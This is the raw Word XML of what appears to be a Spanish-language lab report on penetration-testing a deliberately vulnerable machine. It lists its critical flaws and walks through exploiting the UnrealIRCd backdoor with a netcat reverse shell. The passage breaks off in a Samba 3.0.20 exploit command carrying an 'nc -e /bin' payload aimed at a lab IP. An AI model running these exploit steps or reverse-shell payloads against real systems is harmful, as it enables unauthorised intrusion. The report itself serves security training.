          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34668006">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-3810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="282638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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C56D910" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="7AD200A4" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="656F9EDE" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="062E9E44" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="457A5498" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="010C2669" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B4A2E56">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-13335</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>867410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="282638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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A3FCB" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="51DE2AAF" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="53185C02" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="688E89CC" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="3F49457B" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="78FB4883" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="5B19B8B5" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="04CFDFFC" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRPr="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="35D06D10" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3"/>
    <w:p w14:paraId="17F4C03A" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="237F3A81" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F41AA3" w14:textId="77777777" w:rsidR="00E96437" w:rsidRDefault="00E96437" w:rsidP="00E96437">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.- Analizamos los resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AECCC2" w14:textId="77777777" w:rsidR="00E96437" w:rsidRDefault="00E96437" w:rsidP="00007EB3">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47E08703">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="282638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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F21DBF" w14:textId="77777777" w:rsidR="00E96437" w:rsidRPr="00E96437" w:rsidRDefault="00E96437" w:rsidP="00E96437"/>
    <w:p w14:paraId="506BF81C" w14:textId="77777777" w:rsidR="00E96437" w:rsidRPr="00E96437" w:rsidRDefault="00E96437" w:rsidP="00E96437"/>
    <w:p w14:paraId="591A2E33" w14:textId="77777777" w:rsidR="00E96437" w:rsidRPr="00E96437" w:rsidRDefault="00E96437" w:rsidP="00E96437"/>
    <w:p w14:paraId="5C6B472C" w14:textId="77777777" w:rsidR="00E96437" w:rsidRPr="00E96437" w:rsidRDefault="00E96437" w:rsidP="00E96437"/>
    <w:p w14:paraId="1A964B5D" w14:textId="77777777" w:rsidR="00E96437" w:rsidRPr="00E96437" w:rsidRDefault="00E96437" w:rsidP="00E96437"/>
    <w:p w14:paraId="12D5E33D" w14:textId="77777777" w:rsidR="00E96437" w:rsidRPr="00E96437" w:rsidRDefault="00E96437" w:rsidP="00E96437"/>
    <w:p w14:paraId="327B5455" w14:textId="77777777" w:rsidR="00E96437" w:rsidRDefault="00E96437" w:rsidP="00E96437"/>
    <w:p w14:paraId="405F0B0F" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00E96437" w:rsidP="00E96437">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1215"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1938118C" w14:textId="77777777" w:rsidR="00E96437" w:rsidRDefault="009A5D6E" w:rsidP="00E96437">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1215"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>5. – En esta ocasión nos enfocaremos solo en las vulnerabilidades criticas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705EC32" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="00E96437">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1215"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BA85BE7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-3810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="28263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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="594306D1" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRPr="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="009A5D6E"/>
    <w:p w14:paraId="7B6952CB" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRPr="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="009A5D6E"/>
    <w:p w14:paraId="129A31E8" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRPr="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="009A5D6E"/>
    <w:p w14:paraId="40794402" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRPr="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="009A5D6E"/>
    <w:p w14:paraId="0732D972" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRPr="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="009A5D6E"/>
    <w:p w14:paraId="44CCA04A" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="009A5D6E"/>
    <w:p w14:paraId="792E015C" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="009A5D6E">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F71563" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="009A5D6E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45FC779E" w14:textId="77777777" w:rsidR="009A5D6E" w:rsidRDefault="009A5D6E" w:rsidP="00911363">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabilidades críticas</w:t>
      </w:r>
      <w:r w:rsidR="004F401B">
        <w:t xml:space="preserve"> a explotar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0185BD99" w14:textId="77777777" w:rsidR="004F401B" w:rsidRPr="004F401B" w:rsidRDefault="004F401B" w:rsidP="004F401B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">1.- </w:t>
      </w:r>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Backdoor de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> (puertos 6667/6697): </w:t>
      </w:r>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Permite a un atacante obtener acceso remoto a la máquina sin autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C737DB" w14:textId="77777777" w:rsidR="004F401B" w:rsidRPr="004F401B" w:rsidRDefault="004F401B" w:rsidP="004F401B">
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">2.- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> (puerto 1524):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F401B">
        <w:t xml:space="preserve">Proporciona acceso directo a un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F401B">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F401B">
        <w:t xml:space="preserve"> del sistema como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F401B">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FB6728D" w14:textId="77777777" w:rsidR="004F401B" w:rsidRPr="004F401B" w:rsidRDefault="004F401B" w:rsidP="004F401B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.- </w:t>
      </w:r>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Samba con versión vulnerable (puertos 139/445):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>La versión de Samba expuesta (3.0.20) tiene vulnerabilidades conocidas que pueden ser explotadas para obtener acceso al sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05554DB9" w14:textId="77777777" w:rsidR="004F401B" w:rsidRPr="004F401B" w:rsidRDefault="004F401B" w:rsidP="004F401B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">4.- </w:t>
      </w:r>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Sistema operativo sin soporte (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Kernel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.6):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Un sistema operativo sin soporte no recibe actualizaciones de seguridad, lo que lo hace vulnerable a una gran cantidad de vulnerabilidades conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349369C4" w14:textId="77777777" w:rsidR="004F401B" w:rsidRPr="004F401B" w:rsidRDefault="004F401B" w:rsidP="004F401B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">5.- </w:t>
      </w:r>
      <w:r w:rsidRPr="004F401B">
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>FTP anónimo (puerto 21):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Permite a cualquier usuario obtener acceso a los archivos del sistema sin autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D6533" w14:textId="77777777" w:rsidR="00911363" w:rsidRDefault="0006447F" w:rsidP="0006447F">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explotación de Backdoor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unreallRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32302152" w14:textId="77777777" w:rsidR="0006447F" w:rsidRDefault="0006447F" w:rsidP="0006447F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identificamos la versión de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unreallRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7B0311" w14:textId="77777777" w:rsidR="0006447F" w:rsidRDefault="0006447F" w:rsidP="0006447F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54DA7047" wp14:editId="1445ACE2">
            <wp:extent cx="5612130" cy="28263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26385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931952E" w14:textId="77777777" w:rsidR="0006447F" w:rsidRDefault="0006447F" w:rsidP="0006447F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Buscamos el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, puede ser con “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” o en su defecto con “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchexploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” de Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E34DA75" w14:textId="77777777" w:rsidR="0006447F" w:rsidRDefault="0006447F" w:rsidP="0006447F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B1238F2" wp14:editId="0037D23F">
            <wp:extent cx="5612130" cy="28263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26385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD7EB1" w14:textId="77777777" w:rsidR="0006447F" w:rsidRDefault="00023FE6" w:rsidP="0006447F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cargamos el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y lo lanzamos a la dirección </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> objetivo al puerto que de acuerdo con nmap es en el que la vulnerabilidad está ocurriendo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E20B03" w14:textId="77777777" w:rsidR="00023FE6" w:rsidRDefault="00023FE6" w:rsidP="00023FE6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00023FE6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="651F7DFE" wp14:editId="232429C7">
            <wp:extent cx="5612130" cy="40913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91305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CD7391" w14:textId="77777777" w:rsidR="00023FE6" w:rsidRDefault="00023FE6" w:rsidP="0006447F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Antes de lo anterior ponemos nuestra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en funcionamiento, escuchando el puerto por donde esperamos que se ejecute la Shell Reversa, lanzamos un comando para ver si efectivamente hemos penetrado en la maquina con la </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>vulnerabilidad, asegurándonos de haberlo logrado, podríamos en esencia hacer cualquier cosa, desde crear directorios hasta cargar algún software malicioso para encriptar datos etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD756B8" w14:textId="77777777" w:rsidR="00023FE6" w:rsidRDefault="00023FE6" w:rsidP="00023FE6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00023FE6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04317090" wp14:editId="36D3410F">
            <wp:extent cx="5612130" cy="29114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11475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C26B0E7" w14:textId="77777777" w:rsidR="00023FE6" w:rsidRDefault="00334D22" w:rsidP="00023FE6">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Explotación del puerto 445 a vulnerabilidad SAMBA 3.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035D6284" w14:textId="77777777" w:rsidR="00334D22" w:rsidRDefault="00334D22" w:rsidP="00334D22">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Buscamos con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con el que nos vamos a cargar la maquina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30991834" w14:textId="77777777" w:rsidR="00334D22" w:rsidRDefault="00334D22" w:rsidP="00334D22">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00334D22">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77B7FE61" wp14:editId="4B3A3A96">
            <wp:extent cx="5612130" cy="29749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74975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4249D8" w14:textId="77777777" w:rsidR="00334D22" w:rsidRDefault="00334D22" w:rsidP="00334D22">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creamos un nuevo archivo con sudo nano &lt;nombre del archivo&gt;, copiamos dentro el contenido del script y guardamos con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctrl+O</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, aceptamos la ubicación y salimos </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctrl+x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, asignamos derechos de ejecución y vemos que se encuentre ya listo para ser enviado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1617E433" w14:textId="77777777" w:rsidR="00334D22" w:rsidRDefault="00334D22" w:rsidP="00334D22">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00334D22">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68A6C6AC" wp14:editId="03808A2F">
            <wp:extent cx="5612130" cy="33985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98520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A2E67" w14:textId="77777777" w:rsidR="00334D22" w:rsidRDefault="00334D22" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lanzamos el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> utilizando el comando que dispuso para nosotros el autor del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exp</w:t>
      </w:r>
      <w:r w:rsidR="00207D1E">
        <w:t>loit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00207D1E">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00207D1E" w:rsidRPr="00207D1E">
        <w:t>python3 samba-username-map-script.py 192.168.56.102 445 '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00207D1E" w:rsidRPr="00207D1E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00207D1E" w:rsidRPr="00207D1E">
        <w:t xml:space="preserve"> -e /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00207D1E" w:rsidRPr="00207D1E">
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
